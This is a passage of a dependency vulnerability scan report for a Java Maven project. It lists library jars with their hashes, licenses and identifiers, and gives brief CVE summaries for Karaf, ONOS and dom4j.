org.apache.felix.scr.annotations-1.9.12.jar

Description:

 
        Annotations for generating OSGi service descriptors.
    

File Path: /Users/Kevin/.m2/repository/org/apache/felix/org.apache.felix.scr.annotations/1.9.12/org.apache.felix.scr.annotations-1.9.12.jar
MD5: e229f035b91f99b188304c7d493125d9
SHA1: 5fdc34da641dda8b9165c2be93211479a186da9c
SHA256:c1d6895b5f45351dfbc4290698aeab00ad013339067abfbe73c047b795e72c47
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.felix:org.apache.felix.scr.annotations:1.9.12  Confidence:Highest

jansi-1.11.jar

Description:

 Jansi is a java library for generating and interpreting ANSI escape sequences.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/fusesource/jansi/jansi/1.11/jansi-1.11.jar
MD5: e8bd19df14afe8a0f4e2a44d57c0cd8b
SHA1: 655c643309c2f45a56a747fda70e3fadf57e9f11
SHA256:9e82163ed2fc6257fe627132ce554726e796edee4e5efe9d9e523aee217d60b8
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.fusesource.jansi:jansi:1.11  Confidence:Highest

jline-2.13.jar

License:

The BSD License: http://www.opensource.org/licenses/bsd-license.php
File Path: /Users/Kevin/.m2/repository/jline/jline/2.13/jline-2.13.jar
MD5: f251ba666cccb260ff7215b2cbeee8d4
SHA1: 2d9530d0a25daffaffda7c35037b046b627bb171
SHA256:a6d2c9c0ddff7702662073b69c6dc4ec83011d22e4eb2dada28aa2d66ee47f97
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: jline:jline:2.13  Confidence:Highest

org.apache.felix.fileinstall-3.5.2.jar

Description:

 A utility to automatically install bundles from a directory.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/felix/org.apache.felix.fileinstall/3.5.2/org.apache.felix.fileinstall-3.5.2.jar
MD5: 0d776d72e918612e16004bab2d22eea2
SHA1: 69e816d6d24a1c5807924ba572c62c26e5e64102
SHA256:ac9074e2d92327384d06b5fabaf1c2e81f0f116a7b237b93f3170bb20b24518d
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.felix:org.apache.felix.fileinstall:3.5.2  Confidence:Highest

sshd-core-0.14.0.jar

Description:

 The Apache Software Foundation provides support for the Apache community of open-source software projects.    The Apache projects are characterized by a collaborative, consensus based development process, an open and    pragmatic software license, and a desire to create high quality software that leads the way in its field.    We consider ourselves not simply a group of projects sharing a server, but rather a community of developers    and users.

License:

http://www.apache.org/licenses/LICENSE-2.0
File Path: /Users/Kevin/.m2/repository/org/apache/sshd/sshd-core/0.14.0/sshd-core-0.14.0.jar
MD5: 8bcae42c76576a8cfc39db56d7418e37
SHA1: cb12fa1b1b07fb5ce3aa4f99b189743897bd4fca
SHA256:cbbc0ea7ce78572770185acbaa684af809025e2e32c948de57e0d3fb936d7b55
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.sshd:sshd-core:0.14.0  Confidence:Highest

org.apache.karaf.system.core-3.0.8.jar

Description:

 
        This bundle provides services to manipulate the Karaf container itself (system).
    

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/karaf/system/org.apache.karaf.system.core/3.0.8/org.apache.karaf.system.core-3.0.8.jar
MD5: 00dd26737f49950467381b32473e7ebf
SHA1: 80378de4aeae603889d3408489ff5b9918e6064c
SHA256:3e1397c8b09a90ddb591e0815371ffd962d244747c3ddd2dc475f312610cc21b
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.karaf.system:org.apache.karaf.system.core:3.0.8  Confidence:Highest
  • cpe: cpe:/a:apache:karaf:3.0.8  Confidence:Low  

CVE-2014-0219  

Severity:Low
CVSS Score: 2.1 (AV:L/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

Apache Karaf enables a shutdown port on the loopback interface, which allows local users to cause a denial of service (shutdown) by sending a shutdown command to all listening high ports.

Vulnerable Software & Versions:

xml-apis-1.0.b2.jar

Description:

 xml-commons provides an Apache-hosted set of DOM, SAX, and 
    JAXP interfaces for use in other xml-based projects. Our hope is that we 
    can standardize on both a common version and packaging scheme for these 
    critical XML standards interfaces to make the lives of both our developers 
    and users easier. The External Components portion of xml-commons contains 
    interfaces that are defined by external standards organizations. For DOM, 
    that's the W3C; for SAX it's David Megginson and sax.sourceforge.net; for 
    JAXP it's Sun.

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/xml-apis/xml-apis/1.0.b2/xml-apis-1.0.b2.jar
MD5: 458715c0f7646a56b1c6ad3138098beb
SHA1: 3136ca936f64c9d68529f048c2618bd356bf85c9
SHA256:8232f3482c346d843e5e3fb361055771c1acc105b6d8a189eb9018c55948cf9f
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: xml-apis:xml-apis:1.0.b2  Confidence:Highest

org.apache.servicemix.bundles.dom4j-1.6.1_5.jar

Description:

 This OSGi bundle wraps ${pkgArtifactId} ${pkgVersion} jar file.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/servicemix/bundles/org.apache.servicemix.bundles.dom4j/1.6.1_5/org.apache.servicemix.bundles.dom4j-1.6.1_5.jar
MD5: 23883e3957d1ca226220db6f9c2964bb
SHA1: f5da21ae9508008f7b28001983adc143cb310ad7
SHA256:15abe1ccad24f4fd71a926959f1acd64d84878348deee12dcf4928ee4f1db3d5
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.servicemix.bundles:org.apache.servicemix.bundles.dom4j:1.6.1_5  Confidence:Highest
  • cpe: cpe:/a:dom4j_project:dom4j:1.6.1.5  Confidence:Low  

org.osgi.compendium-5.0.0.jar

Description:

 
    OSGi Compendium Release 5, Interfaces and Classes for use in compiling bundles.
  

License:

        Apache License, Version 2.0
      : 
        http://opensource.org/licenses/apache2.0.php
      
File Path: /Users/Kevin/.m2/repository/org/osgi/org.osgi.compendium/5.0.0/org.osgi.compendium-5.0.0.jar
MD5: 9536e0ce63ca8c06eacec820c88fccf7
SHA1: 9d7a9c35591f6fa1c98ac85af32775c12361aee4
SHA256:f1ef32cc1530f4e66aac606c24363b627ace4780a7737b045bfb3b908d801bcd
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.osgi:org.osgi.compendium:5.0.0  Confidence:Highest
  • maven:  org.osgi : org.osgi.compendium : 5.0.0   Confidence:High

org.osgi.core-5.0.0.jar

Description:

 
    OSGi Service Platform Release 5 Version 5.0, Core Interfaces
     and Classes for use in compiling bundles.
  

License:

        Apache License, Version 2.0
      : 
        http://opensource.org/licenses/apache2.0.php
      
File Path: /Users/Kevin/.m2/repository/org/osgi/org.osgi.core/5.0.0/org.osgi.core-5.0.0.jar
MD5: dce566ce791ffc76e074ff7009d5e795
SHA1: 6e5e8cd3c9059c08e1085540442a490b59a7783c
SHA256:b440c6bff286332afcf5cae067b606962e761c0df00e5fd8a746f0b31265619b
Referenced In Project/Scope:trial:compile

Identifiers

  • maven:  org.osgi : org.osgi.core : 5.0.0   Confidence:High
  • maven: org.osgi:org.osgi.core:5.0.0  Confidence:Highest

reflectasm-1.11.0.jar

Description:

 High performance Java reflection using code generation

License:

New BSD License: http://www.opensource.org/licenses/bsd-license.php
File Path: /Users/Kevin/.m2/repository/com/esotericsoftware/reflectasm/1.11.0/reflectasm-1.11.0.jar
MD5: dc5442d63ff26a0e5d52fbc21a2831ca
SHA1: f747d8b017a26bac575f8da14e8c1df6aecd3154
SHA256:eef46e43a6861cdbb3356295644341a48d9a4c1cf753eb5f03cf7bff3a07d180
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.esotericsoftware:reflectasm:1.11.0  Confidence:Highest

onlab-misc-1.13.1.jar

File Path: /Users/Kevin/.m2/repository/org/onosproject/onlab-misc/1.13.1/onlab-misc-1.13.1.jar
MD5: 9ce1d887af9b5a5239db89a37a79b075
SHA1: d9fe6097075105ba5f1e8a877bd83f39fd909e03
SHA256:b9780130eeab5196cca32706f22cbb6969373c2fd7a26fcbee9881ca373cbc1c
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2018-1000614  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')

ONOS ONOS Controller version 1.13.1 and earlier contains a XML External Entity (XXE) vulnerability in providers/netconf/alarm/src/main/java/org/onosproject/provider/netconf/alarm/NetconfAlarmTranslator.java that can result in An adversary can remotely launch advanced XXE attacks on ONOS controller without authentication.. This attack appear to be exploitable via crafted protocol message.

Vulnerable Software & Versions:

CVE-2018-1000615  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

ONOS ONOS Controller version 1.13.1 and earlier contains a Denial of Service (Service crash) vulnerability in OVSDB component in ONOS that can result in An adversary can remotely crash OVSDB service ONOS controller via a normal switch.. This attack appear to be exploitable via the attacker should be able to control or forge a switch in the network..

Vulnerable Software & Versions:

CVE-2018-1000616  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')

ONOS ONOS controller version 1.13.1 and earlier contains a XML External Entity (XXE) vulnerability in onos\drivers\utilities\src\main\java\org\onosproject\drivers\utilities\XmlConfigParser.java loadxml() that can result in An adversary can remotely launch XXE attacks on ONOS controller via an OpenConfig Terminal Device.. This attack appear to be exploitable via network connectivity.

Vulnerable Software & Versions:

lucene-analyzers-common-7.0.1.jar

Description:

 Additional Analyzers

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-analyzers-common/7.0.1/lucene-analyzers-common-7.0.1.jar
MD5: ea1472f430211c927563e47672a0bd3d
SHA1: 5f6b74b083e5925b00bb89a1146c76c9a0b208e0
SHA256:f431e9c0b398c3dfd129e5c27f9badfc67c627de2eada2c786d3db3976213efa
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-analyzers-common:7.0.1  Confidence:Highest

lucene-analyzers-kuromoji-7.0.1.jar

Description:

 
    Lucene Kuromoji Japanese Morphological Analyzer
  

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-analyzers-kuromoji/7.0.1/lucene-analyzers-kuromoji-7.0.1.jar
MD5: 799b370b1f3979a6dda89d2f19f93e1d
SHA1: f7cc8d5667a915a77d8d75a42082a9bf7a4f90fa
SHA256:9c8314957013cea7465320646074d10db55171db759a8967c0826c97839f3ee7
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-analyzers-kuromoji:7.0.1  Confidence:Highest

lucene-analyzers-phonetic-7.0.1.jar

Description:

 
    Provides phonetic encoding via Commons Codec.
  

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-analyzers-phonetic/7.0.1/lucene-analyzers-phonetic-7.0.1.jar
MD5: 8df8c08733c0cba9956c4e809aa86977
SHA1: be14b71ed53e99df493e526fbe9fe56dcf709148
SHA256:5c73488a63341409ea5131706527272152365ac60538df03f6850cd534861d3e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-analyzers-phonetic:7.0.1  Confidence:Highest

lucene-backward-codecs-7.0.1.jar

Description:

 
    Codecs for older versions of Lucene.
  

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-backward-codecs/7.0.1/lucene-backward-codecs-7.0.1.jar
MD5: 0b1e104832688195be096629046ecf63
SHA1: 18638048b965511a490b84c1e2623d396b7b9a3f
SHA256:012a7bae1663f373b3440b689436abfd90b409b02bece2c57f0a0d9937a11ea9
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-backward-codecs:7.0.1  Confidence:Highest

lucene-classification-7.0.1.jar

Description:

 Lucene Classification

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-classification/7.0.1/lucene-classification-7.0.1.jar
MD5: 664ece05ffe885c286cdf4ad53e26bcf
SHA1: 5487501888b3454d8a6f07900fdf580c7460c7e5
SHA256:bb02948c45705f3f82014058c64cdf7deddb6f8e39506505b6fa16ca5c6391b3
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-classification:7.0.1  Confidence:Highest

lucene-codecs-7.0.1.jar

Description:

 
    Codecs and postings formats for Apache Lucene.
  

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-codecs/7.0.1/lucene-codecs-7.0.1.jar
MD5: 66c3665c360daa555c81f50f28da356c
SHA1: dbe35cc23b9e6dc1bd73c08363f0ecd02e6e7188
SHA256:654d0af78360fa9cf7118448565dc0de9e9934c86dded3a5bed34e7adf6d1a8c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-codecs:7.0.1  Confidence:Highest

lucene-core-7.0.1.jar

Description:

 Apache Lucene Java Core

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-core/7.0.1/lucene-core-7.0.1.jar
MD5: c9f9e9458069a3707efe8ce27af18bbb
SHA1: 3f1ad4670da69cf5b4489b59152dce4eea252ff5
SHA256:8586ecb0521390097044a150fa71ffa15dbab9745bb96224e4c4ad3b391b4b56
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-core:7.0.1  Confidence:Highest

lucene-expressions-7.0.1.jar

Description:

     
     Dynamically computed values to sort/facet/search on based on a pluggable grammar.
  

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-expressions/7.0.1/lucene-expressions-7.0.1.jar
MD5: 0e8b7705785225dcf1d0313cef5dabe2
SHA1: 4dee7e95dd1c4fec151ad6604825cdf696b52e88
SHA256:00a9f7193b99c239b6e62a89cf02caa8e957f423b24f1687a03ff43ad7d8815e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-expressions:7.0.1  Confidence:Highest

lucene-grouping-7.0.1.jar

Description:

 Lucene Grouping Module

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-grouping/7.0.1/lucene-grouping-7.0.1.jar
MD5: 2056241cda8f992e353b1cfee182155c
SHA1: 6615491d5d2017e0243c2c2e016f92a8ca12db60
SHA256:b4d0ed9dbb046ddce6713c26bd2688038095b8d83647524e890820437fdefa60
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-grouping:7.0.1  Confidence:Highest

lucene-highlighter-7.0.1.jar

Description:

 
    This is the highlighter for apache lucene java
  

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-highlighter/7.0.1/lucene-highlighter-7.0.1.jar
MD5: 0d3cdaaaf71edbb3be1902cde2c175b6
SHA1: 888bf6b9a1e8bd69931e30c67fc01edd284b4c81
SHA256:19b90fb993913bb954a320db052aa088798762e9d5c5b20a19f9c11ed43d44ea
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-highlighter:7.0.1  Confidence:Highest

lucene-join-7.0.1.jar

Description:

 Lucene Join Module

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-join/7.0.1/lucene-join-7.0.1.jar
MD5: 8e521d0d356c1b47f7726a837f296451
SHA1: bfa8769171ef4c12d347a094c90a5b314d4d7915
SHA256:411645c64129e101abe37e3fdc29ee6d09a2cbde0d2632384d2201a6133cc96b
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-join:7.0.1  Confidence:Highest

lucene-memory-7.0.1.jar

Description:

 
    High-performance single-document index to compare against Query
  

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-memory/7.0.1/lucene-memory-7.0.1.jar
MD5: 5fa48c7b1a2513ba8479988814c657fe
SHA1: c9bdc376260a5c94318085f6b5ba932cfdd51ad8
SHA256:412729936c08114ed4ebec966e8af599eb3402a55dce322184ec92861b6333fe
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-memory:7.0.1  Confidence:Highest

lucene-misc-7.0.1.jar

Description:

 Miscellaneous Lucene extensions

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-misc/7.0.1/lucene-misc-7.0.1.jar
MD5: f4018cffa28eff63e737bf84d445f3e9
SHA1: c72dd9d63f92f0e82961dd38e169d5affdb915b0
SHA256:d133dcd0110f6a57e7f4a7f94c003edf606e38ce807ff417de00675986aab3e1
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-misc:7.0.1  Confidence:Highest

lucene-queries-7.0.1.jar

Description:

 Lucene Queries Module

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-queries/7.0.1/lucene-queries-7.0.1.jar
MD5: c0706b29d50e357ee1741d46aa8378c4
SHA1: 168e774681469e0d8902680d6cfce0131d6421bf
SHA256:487a16504e9150a39c239ce5756cd7200e093c29ffbcbfc5c287ccf5a2d0ce3a
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-queries:7.0.1  Confidence:Highest

lucene-queryparser-7.0.1.jar

Description:

 Lucene QueryParsers module

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-queryparser/7.0.1/lucene-queryparser-7.0.1.jar
MD5: fddb96f61a0783f9e0198db3f75227cd
SHA1: 4634a493b78fe7ced32ca34dc107b753a280a276
SHA256:7ab1623c1dc892c3ba4f935d915dc5e02afb3e411db08a0a2094bbb8e3a8185e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-queryparser:7.0.1  Confidence:Highest

lucene-sandbox-7.0.1.jar

Description:

 Lucene Sandbox

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-sandbox/7.0.1/lucene-sandbox-7.0.1.jar
MD5: 0ce54aa5d25080af63a8af8e52185b59
SHA1: a379474d929b909b1602ecfd093df8ef70f76776
SHA256:dcd59d03328a7e3b1498b93193c315b1c0973f645c2e4a50be72de5d5e4de59e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-sandbox:7.0.1  Confidence:Highest

lucene-spatial-extras-7.0.1.jar

Description:

 
    Advanced Spatial Shape Strategies for Apache Lucene
  

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-spatial-extras/7.0.1/lucene-spatial-extras-7.0.1.jar
MD5: 148633aba66114a8585ccac62e9541eb
SHA1: 86f777596734662402b55e24a2848f0ac4a96628
SHA256:7b096ee98b185aa916e557e105e1af68fcd2cdc8f38955f328cd5b77a5645cd1
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-spatial-extras:7.0.1  Confidence:Highest

lucene-suggest-7.0.1.jar

Description:

 Lucene Suggest Module

File Path: /Users/Kevin/.m2/repository/org/apache/lucene/lucene-suggest/7.0.1/lucene-suggest-7.0.1.jar
MD5: c9c56997504302b075b9703e43d5627d
SHA1: 71cf313010f44841f9cfb70e71559af50ea8198b
SHA256:b6d23085298ae5fce8eabaf8b81f066caa9f30eef52574adb81a343920b7740b
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.lucene:lucene-suggest:7.0.1  Confidence:Highest

hppc-0.7.1.jar

Description:

 High Performance Primitive Collections. 
  Fundamental data structures (maps, sets, lists, stacks, queues) generated for
  combinations of object and primitive types to conserve JVM memory and speed
  up execution.

File Path: /Users/Kevin/.m2/repository/com/carrotsearch/hppc/0.7.1/hppc-0.7.1.jar
MD5: 2ff89be5b49144c330190cf7137c3a26
SHA1: 8b5057f74ea378c0150a1860874a3ebdcb713767
SHA256:40d2a57f59e9eae7b018d3b4841954087ee40a5c1db6a54c3ea87742e3890391
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.carrotsearch:hppc:0.7.1  Confidence:Highest

jackson-dataformat-smile-2.5.4.jar

Description:

 Support for reading and writing Smile ("binary JSON")
encoded data using Jackson abstractions (streaming API, data binding,
tree model)
  

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/fasterxml/jackson/dataformat/jackson-dataformat-smile/2.5.4/jackson-dataformat-smile-2.5.4.jar
MD5: a3868ca8efddfec575b139f574e21dc2
SHA1: db0c5f1b6e16cb5f5e0505abfcd4b36f3e8bfdc6
SHA256:b3deecbe7ba584846b7439d936f9bdd1dd7c62383af8c74044587a77b6484457
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.fasterxml.jackson.dataformat:jackson-dataformat-smile:2.5.4  Confidence:Highest
  • cpe: cpe:/a:fasterxml:jackson:2.5.4  Confidence:Low  

caffeine-2.4.0.jar

Description:

 A high performance caching library for Java 8+

License:

Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/github/ben-manes/caffeine/caffeine/2.4.0/caffeine-2.4.0.jar
MD5: 88d83922414143f7c3c1d12b83ca4d7b
SHA1: 5aa8bbb851b1ad403cc140094ba4a25998369efe
SHA256:a70d0ce267c92820aeb2790720643b3554e09ae7a95b5f5cc5e9c4800fcfab44
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.github.ben-manes.caffeine:caffeine:2.4.0  Confidence:Highest

protobuf-java-3.1.0.jar

Description:

 
    Core Protocol Buffers library. Protocol Buffers are a way of encoding structured data in an
    efficient yet extensible format.
  

License:

http://www.opensource.org/licenses/bsd-license.php
File Path: /Users/Kevin/.m2/repository/com/google/protobuf/protobuf-java/3.1.0/protobuf-java-3.1.0.jar
MD5: 6fcd9d8f757eea48ac7f3e1b279f94e8
SHA1: e13484d9da178399d32d2d27ee21a77cfb4b7873
SHA256:8d7ec605ca105747653e002bfe67bddba90ab964da697aaa5daa1060923585db
Referenced In Project/Scope:trial:compile

Identifiers

t-digest-3.1.jar

Description:

 Data structure which allows accurate estimation of quantiles and related rank statistics

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/com/tdunning/t-digest/3.1/t-digest-3.1.jar
MD5: ba0c00142170b71bd3ae17d2d7e4e38b
SHA1: 451ed219688aed5821a789428fd5e10426d11312
SHA256:271f3a5a4bc79d7554c9e9e557669af83bcbda0db871e0b8c969d56e51c123a9
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: com.tdunning:t-digest:3.1  Confidence:Highest

dom4j-1.6.1.jar

Description:

 dom4j: the flexible XML framework for Java

File Path: /Users/Kevin/.m2/repository/dom4j/dom4j/1.6.1/dom4j-1.6.1.jar
MD5: 4d8f51d3fe3900efc6e395be48030d6d
SHA1: 5d3ccc056b6f056dbf0dddfdf43894b9065a8f94
SHA256:593552ffea3c5823c6602478b5002a7c525fd904a3c44f1abe4065c22edfac73
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2018-1000632  

Severity:Medium
CVSS Score: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P)
CWE: CWE-91 XML Injection (aka Blind XPath Injection)

dom4j version prior to version 2.1.1 contains a CWE-91: XML Injection vulnerability in Class: Element. Methods: addElement, addAttribute that can result in an attacker tampering with XML documents through XML injection. This attack appear to be exploitable via an attacker specifying attributes or elements in the XML document. This vulnerability appears to have been fixed in 2.1.1 or later.

Vulnerable Software & Versions: (show all)

gmetric4j-1.0.7.jar

Description:

 JVM instrumentation to Ganglia

License:

The MIT License: http://www.opensource.org/licenses/mit-license.php
File Path: /Users/Kevin/.m2/repository/info/ganglia/gmetric4j/gmetric4j/1.0.7/gmetric4j-1.0.7.jar
MD5: ae36017546569c0312ba11f7b8c369c3
SHA1: 37a1cb0d8821cad9bd33f1ce454459fed18efa44
SHA256:b71d7e1ad919506385f4489084a05bf02a7fbda0b7eeb151fc6adae9866c3aba
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: info.ganglia.gmetric4j:gmetric4j:1.0.7  Confidence:Highest

metrics-ganglia-3.2.2.jar

Description:

 
        A reporter for Metrics which announces measurements to a Ganglia cluster.
    

License:

http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /Users/Kevin/.m2/repository/io/dropwizard/metrics/metrics-ganglia/3.2.2/metrics-ganglia-3.2.2.jar
MD5: 6998771417e4efe002eaa0f82bd939fb
SHA1: d5bb1883e9b0daf0e4187e558746f5058f4585c1
SHA256:fdae87ba15898e1754c885afab1594962b0bb24e2049ad35b853521b458f7351
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: io.dropwizard.metrics:metrics-ganglia:3.2.2  Confidence:Highest

metrics-graphite-3.2.2.jar

Description:

 
        A reporter for Metrics which announces measurements to a Graphite server.
    

License:

http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /Users/Kevin/.m2/repository/io/dropwizard/metrics/metrics-graphite/3.2.2/metrics-graphite-3.2.2.jar
MD5: ba2f49e74fbfbdbb36045755684f896e
SHA1: 908e8cbec1bbdb2f4023334e424c7de2832a95af
SHA256:cb967ecf5d6d88fe08322b8fe64b885ef2ce0e74ed8fc9bfea286e7aad2e6d47
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:graphite_project:graphite:3.2.2  Confidence:Low  
  • maven: io.dropwizard.metrics:metrics-graphite:3.2.2  Confidence:Highest

metrics-jetty9-3.2.2.jar

Description:

 
        A set of extensions for Jetty 9.1 and higher which provide instrumentation of thread pools, connector
        metrics, and application latency and utilization.
    

License:

http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /Users/Kevin/.m2/repository/io/dropwizard/metrics/metrics-jetty9/3.2.2/metrics-jetty9-3.2.2.jar
MD5: 42a436bbd0e679c9e1737ab7bf5dcf75
SHA1: 3fc94d99f41dc3f5be5483c81828138104df4449
SHA256:ee2a8a882b9a0a87d8c76139c409ddf25ebb7c666f8b4da9b1929214302c370d
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: io.dropwizard.metrics:metrics-jetty9:3.2.2  Confidence:Highest
  • cpe: cpe:/a:jetty:jetty:3.2.2  Confidence:Low  

metrics-jvm-3.2.2.jar

Description:

 
        A set of classes which allow you to monitor critical aspects of your Java Virtual Machine
        using Metrics.
    

License:

http://www.apache.org/licenses/LICENSE-2.0.html
File Path: /Users/Kevin/.m2/repository/io/dropwizard/metrics/metrics-jvm/3.2.2/metrics-jvm-3.2.2.jar
MD5: 628535c45f493ea53527258e1ddbfe8b
SHA1: 9cbf2030242f7ffb97fae23f8a81421eb8d4ad45
SHA256:bdbe173890c2572ee53fc005a472950150a76a1a038f6114099c67508e559a6c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: io.dropwizard.metrics:metrics-jvm:3.2.2  Confidence:Highest

log4j-1.2.17.jar

Description:

 Apache Log4j 1.2

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/log4j/log4j/1.2.17/log4j-1.2.17.jar
MD5: 04a41f0a068986f0f73485cf507c0f40
SHA1: 5af35056b4d257e4b64b9e8069c0746e8b08629f
SHA256:1d31696445697720527091754369082a6651bd49781b6005deb94e56753406f9
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:log4j:1.2.17  Confidence:Low  
  • maven: log4j:log4j:1.2.17  Confidence:Highest

eigenbase-properties-1.1.5.jar

Description:

 Type-safe access to Java system properties

License:

Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/net/hydromatic/eigenbase-properties/1.1.5/eigenbase-properties-1.1.5.jar
MD5: 74250b1aa57ff13507bf28c09e5299eb
SHA1: a941956b3a4664d0cf728ece06ba25cc2110a3aa
SHA256:9394a752411d9729a083cf578ed9666ec9a7f59c18c9ca889127480a44c7285c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: net.hydromatic:eigenbase-properties:1.1.5  Confidence:Highest

antlr4-runtime-4.5.1-1.jar

Description:

 The ANTLR 4 Runtime

License:

http://www.antlr.org/license.html
File Path: /Users/Kevin/.m2/repository/org/antlr/antlr4-runtime/4.5.1-1/antlr4-runtime-4.5.1-1.jar
MD5: c57e3c5fd251603e1d815ec1d6fde69b
SHA1: 66144204f9d6d7d3f3f775622c2dd7e9bd511d97
SHA256:ffca72bc2a25bb2b0c80a58cee60530a78be17da739bb6c91a8c2e3584ca099e
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.antlr:antlr4-runtime:4.5.1-1  Confidence:Highest

calcite-core-1.13.0.jar

Description:

 Core Calcite APIs and engine.

File Path: /Users/Kevin/.m2/repository/org/apache/calcite/calcite-core/1.13.0/calcite-core-1.13.0.jar
MD5: 29b1ddb56d998c4503737088f49074e7
SHA1: 1e7995aa0afe4c27a12e7b320a2938dcf05d9581
SHA256:0cb6147c7c6373da536f5f856a307e36ea32b90951b90f88fe5bda335939fb97
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.calcite:calcite-core:1.13.0  Confidence:Highest

calcite-linq4j-1.13.0.jar

Description:

 Calcite APIs for LINQ (Language-Integrated Query) in Java

File Path: /Users/Kevin/.m2/repository/org/apache/calcite/calcite-linq4j/1.13.0/calcite-linq4j-1.13.0.jar
MD5: 6537b031565b9c7f0dea69953f93e0d6
SHA1: 96c814d27516cf48d439277300252bfb2b00486f
SHA256:1d172b70bb9a79848cf60e8149c7b6dfbc97b5bd1d2bd61919ae1f4009b718b3
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.calcite:calcite-linq4j:1.13.0  Confidence:Highest

avatica-core-1.10.0.jar

Description:

 JDBC driver framework.

